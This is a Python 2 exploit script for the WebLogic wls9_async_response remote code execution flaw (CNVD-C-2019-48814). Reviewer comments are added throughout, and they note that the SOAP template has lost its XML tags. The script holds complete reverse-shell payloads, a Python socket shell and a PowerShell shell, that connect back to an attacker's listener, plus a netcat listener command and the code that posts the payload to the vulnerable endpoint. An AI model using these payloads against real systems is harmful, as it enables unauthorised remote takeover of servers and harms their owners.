#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: Weblogic wls9_async_response RCE
# Exploit Author: fuhei
# CNVD: CNVD-C-2019-48814
# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://www.lovei.org:7001/
# (Netcat) Example exploit listener: nc -nlvp 4444
#
# Reviewer notes (do not change behaviour, only document it):
# - This is Python 2 code: run() uses bare `print '...'` statements and
#   `print(...).format(...)`, both of which only work as written under a
#   Python 2 interpreter. The `python` in the shebang must resolve to 2.x.
# - In this copy of the file the XML element tags of the SOAP/WorkContext
#   template in get_process_builder_payload() are missing (only the text
#   nodes and the three format placeholders survived), so as shown here the
#   execute mode cannot produce a valid request. The template is kept
#   byte-for-byte and is deliberately NOT reconstructed.
# - The tool spawns a reverse shell on the target; use only against systems
#   you are explicitly authorised to test.
# - `exit`, `choice`, `ascii_uppercase`, `ascii_lowercase` and `digits` are
#   imported but never used in this file.

from sys import exit
import requests
from requests import post
from argparse import ArgumentParser
from random import choice
from string import ascii_uppercase, ascii_lowercase, digits
from xml.sax.saxutils import escape

class Exploit:
    """Driver for the wls9_async_response (/_async/AsyncResponseService) PoC.

    Two modes, selected by ``check``:

    * check mode   - GET the service endpoint and report whether it is
      present (see get_generic_check_payload; presence is not proof of
      vulnerability).
    * execute mode - POST a ProcessBuilder payload that runs a reverse shell
      back to ``lhost:lport``.

    Attributes set in __init__: url (base URL without trailing slash), lhost,
    lport (string, as received from argparse), check (bool), target
    ('win' or 'unix') and cmd_payload (the XML-escaped shell one-liner).
    """

    def __init__(self, check, rhost, lhost, lport, windows):
        """Store the target/listener settings and build the shell command.

        check   -- True for check mode, False for execute mode.
        rhost   -- base URL of the WebLogic server, e.g. http://host:7001/
        lhost   -- address the reverse shell connects back to.
        lport   -- port the reverse shell connects back to (string; it is
                   formatted straight into the shell one-liners below).
        windows -- True selects the PowerShell payload, False the python one.
        """
        # NOTE(review): str.strip('/') strips slashes at BOTH ends. Harmless
        # for an http(s):// URL, but rstrip('/') is what is actually meant.
        self.url = rhost if not rhost.endswith('/') else rhost.strip('/')
        self.lhost = lhost
        self.lport = lport
        self.check = check
        if windows:
            self.target = 'win'
        else:
            self.target = 'unix'

        if self.target == 'unix':
            # Unix reverse shell
            # You should also be able to instead use something from MSFVenom. E.g.
            # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444
            # Requires a `python` binary on the target; /bin/sh -i is dup2'd
            # onto the socket for stdin/stdout/stderr.
            self.cmd_payload = (
                "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket."
                "SOCK_STREAM);s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0); os.dup2("
                "s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
            ).format(lhost=self.lhost, lport=self.lport)
        else:
            # Windows reverse shell
            # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444
            # lhost/lport are spliced in by plain string concatenation (the
            # pieces are raw strings, so no .format() placeholders here).
            # Note the msfvenom template reuses `$p`: first the port, then the
            # cmd.exe Process object.
            self.cmd_payload = (
                r"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) "
                r"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='" + self.lhost +""
                r"';$p='"+ self.lport + "';$c=New-Object system.net.sockets.tcpclient;$c.connect($a"
                r",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;"
                r"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';"
                r"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;"
                r"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;"
                r"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;"
                r"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};"
                r"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;"
                r"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)"
                r" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;"
                r"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};"
                r"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if "
                r"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne"
                r" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e."
                r"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};"
            )
        # XML-escape &, < and > so the one-liner survives being embedded as a
        # text node of the SOAP body (xml.sax.saxutils.escape does not touch
        # quotes, which both payloads rely on).
        self.cmd_payload = escape(self.cmd_payload)

    def cmd_base(self):
        """Interpreter handed to ProcessBuilder as argv[0] for this target."""
        if self.target == 'win':
            return 'cmd'
        return '/bin/sh'

    def cmd_opt(self):
        """The "run the next argument as a command string" flag for cmd_base()."""
        if self.target == 'win':
            return '/c'
        return '-c'


    def get_generic_check_payload(self):
        """Return True when the async service endpoint answers with 'Welcome'.

        Despite the name this builds no payload: it is an unauthenticated GET
        of /_async/AsyncResponseService, and True only means the endpoint is
        deployed. A patched server serves the same page, so a True result is
        "worth trying", not "vulnerable".
        """
        check_url = self.url + '/_async/AsyncResponseService'
        try:
            # NOTE(review): unlike post_exploit() this call has no timeout and
            # does not pass verify=False, so it can hang, and an https target
            # with a self-signed cert fails here and is reported as not
            # vulnerable.
            check = requests.get(check_url)
            #print check.text
            if 'Welcome' in check.text:
                return True
            else:
                return False
        except:
            # NOTE(review): bare except - also swallows KeyboardInterrupt and
            # turns every network error into "not vulnerable". A fix would
            # narrow this to requests.RequestException.
            return False

    def get_process_builder_payload(self):
        """Return the request body with interpreter, flag and command filled in.

        The three placeholders are cmd_base(), cmd_opt() and the already
        XML-escaped cmd_payload from __init__.

        NOTE(review): in this copy of the file the template below has lost its
        XML element tags (they appear to have been stripped on extraction);
        only the text nodes ("xx", the placeholders) remain, so the result is
        not a valid SOAP request. It is kept byte-for-byte, not reconstructed.
        """
        process_builder_payload = '''

xx
xx




{cmd_base}


{cmd_opt}


{cmd_payload}








'''
        return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),
                                              cmd_payload=self.cmd_payload)

    def print_banner(self):
        """Print the target and listener settings to stdout."""
        print("=" * 80)
        print("CNVD-C-2019-48814 RCE Exploit")
        print("written by: fuhei")
        print("Remote Target: {rhost}".format(rhost=self.url))
        print("Shell Listener: {lhost}:{lport}".format(
            lhost=self.lhost, lport=self.lport))
        print("=" * 80)

    def post_exploit(self, data):
        """POST ``data`` to /_async/AsyncResponseService and report on stdout.

        The HTTP response is never inspected (`req` is unused): success is
        judged out of band, by whether the listener received a connection.
        Network errors are caught and printed, not raised.
        """
        headers = {
            "Content-Type":
            "text/xml;charset=UTF-8",
            "User-Agent":
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
        }
        payload = "/_async/AsyncResponseService"

        vulnurl = self.url + payload
        try:
            # verify=False disables TLS certificate validation (self-signed
            # WebLogic consoles are common). Deliberate for a PoC; it means
            # the request is open to interception on the way to the target.
            req = post(
                vulnurl, data=data, headers=headers, timeout=10, verify=False)
            if self.check:
                # NOTE(review): unreachable from run(): check mode never calls
                # post_exploit(), so this message is stale.
                print("[*] Did you get an HTTP GET request back?")
            else:
                print("[*] Did you get a shell back?")
        except Exception as e:
            print('[!] Connection Error')
            print(e)

    def run(self):
        """Entry point: banner, then either the check or the execute path.

        Returns True/False in check mode (endpoint present or not) and None
        in execute mode.
        """
        self.print_banner()
        if self.check:
            print('[+] Generating generic check payload')
            # Actually a bool, see get_generic_check_payload().
            payload = self.get_generic_check_payload()
            if payload:
                # Python 2 print statements (SyntaxError under Python 3).
                print '[*] Having this vulnerability'
                return True
            else:
                print '[!] This vulnerability does not exist'
                return False
        else:
            print('[+] Generating execution payload')
            payload = self.get_process_builder_payload()
            print('[*] Generated:')
            print(payload)
            # Python 2 only: `print (expr).format(...)` is a print statement
            # whose operand is the formatted string. Under Python 3 print()
            # returns None and this line raises AttributeError.
            print('[+] Running {target} execute payload').format(target=self.target)
            self.post_exploit(data=payload)


if __name__ == "__main__":
    parser = ArgumentParser(
        description=
        'CNVD-C-2019-48814 Oracle wls9_async_response exploit.'
    )
    # NOTE(review): -l and -p are required even in --check mode, where they
    # are only printed in the banner. nargs='?' together with required=True
    # lets `-l` be given with no value, which yields lhost=None.
    parser.add_argument(
        '-l',
        '--lhost',
        required=True,
        dest='lhost',
        nargs='?',
        help='The listening host that the remote server should connect back to')
    parser.add_argument(
        '-p',
        '--lport',
        required=True,
        dest='lport',
        nargs='?',
        help='The listening port that the remote server should connect back to')
    parser.add_argument(
        '-r',
        '--rhost',
        required=True,
        dest='rhost',
        nargs='?',
        help='The remote host base URL that we should send the exploit to')
    # NOTE(review): the help text below is inaccurate for this script: the
    # check is a GET issued by *this* tool (get_generic_check_payload); the
    # target host issues no request of its own.
    parser.add_argument(
        '-c',
        '--check',
        dest='check',
        action='store_true',
        help=
        'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'
    )
    parser.add_argument(
        '-w',
        '--win',
        dest='windows',
        action='store_true',
        help=
        'Use the windows cmd payload instead of unix payload (execute mode only).'
    )

    args = parser.parse_args()

    exploit = Exploit(
        check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,
        windows=args.windows)
    exploit.run()